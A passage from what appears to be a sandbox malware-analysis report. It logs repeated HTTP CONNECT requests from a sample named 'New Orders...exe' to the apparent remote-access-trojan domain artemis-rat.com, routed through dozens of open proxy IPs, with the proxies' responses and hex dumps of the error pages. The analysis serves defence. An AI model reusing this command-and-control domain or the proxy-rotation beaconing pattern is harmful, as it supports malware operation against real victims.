                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        798192.168.2.952462162.120.71.11807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.817771912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.059564114 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        799192.168.2.952297103.122.33.3481827672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.817959070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.172525883 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        800192.168.2.952333181.110.214.13431287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.818099022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.179430008 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        801192.168.2.951295178.115.230.24380807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.820611954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.298749924 CET202INHTTP/1.0 403 Forbidden
                                                                                        Content-Length: 487
                                                                                        Content-Type: text/html
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Expires: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Server: Mikrotik HttpProxy
                                                                                        Proxy-Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        802192.168.2.95120795.47.119.12280807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.821897030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.835820913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.778821945 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        803192.168.2.949870168.228.36.22272347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.822002888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.835804939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.092303038 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        804192.168.2.95242538.7.18.10280807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.822993040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.657448053 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        805192.168.2.952250202.166.219.8041537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.825068951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        806192.168.2.952256123.126.158.50807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.826071978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        807192.168.2.952164202.144.157.190097672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.826643944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.156656981 CET20INHTTP/1.0 200 OK
                                                                                        Data Raw: 00
                                                                                        Data Ascii:


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        808192.168.2.95251445.61.188.134444997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.826844931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.476362944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        809192.168.2.95252845.60.186.208274887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.827229977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        810192.168.2.95248123.19.244.10910807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.827647924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        811192.168.2.952404203.74.125.1888887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.829025030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        812192.168.2.95240298.162.25.29316797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.829507113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        813192.168.2.952396147.75.34.85100077672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.829778910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.131548882 CET356INHTTP/1.0 502 Bad Gateway
                                                                                        Server: Zscaler/6.3
                                                                                        Content-Type: text/html
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        814192.168.2.95240547.242.234.237807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.830260038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        815192.168.2.952407154.12.178.107299857672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.831111908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        816192.168.2.952555146.19.106.194123347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.832789898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        817192.168.2.95260343.153.58.2044437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.834985971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        818192.168.2.952389185.49.30.580817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.835166931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        819192.168.2.952432196.20.125.14580837672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.837685108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        820192.168.2.95248831.223.184.143807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.844712019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.207659960 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        821192.168.2.952443185.109.184.150638197672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.847338915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.538814068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.491933107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.439172029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.132976055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.835813046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.632740021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.945343971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:19.445292950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        822192.168.2.950893128.199.184.16980007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.848459959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.199410915 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        823192.168.2.95260943.153.58.2044437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.848867893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        824192.168.2.95240680.78.64.7041457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.852303028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        825192.168.2.95261043.153.58.2044437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.852930069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        826192.168.2.952314106.105.218.244807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.855153084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        827192.168.2.94992437.187.77.58107107672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.855212927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.945185900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.946023941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.945595026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        828192.168.2.952421156.67.217.159807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
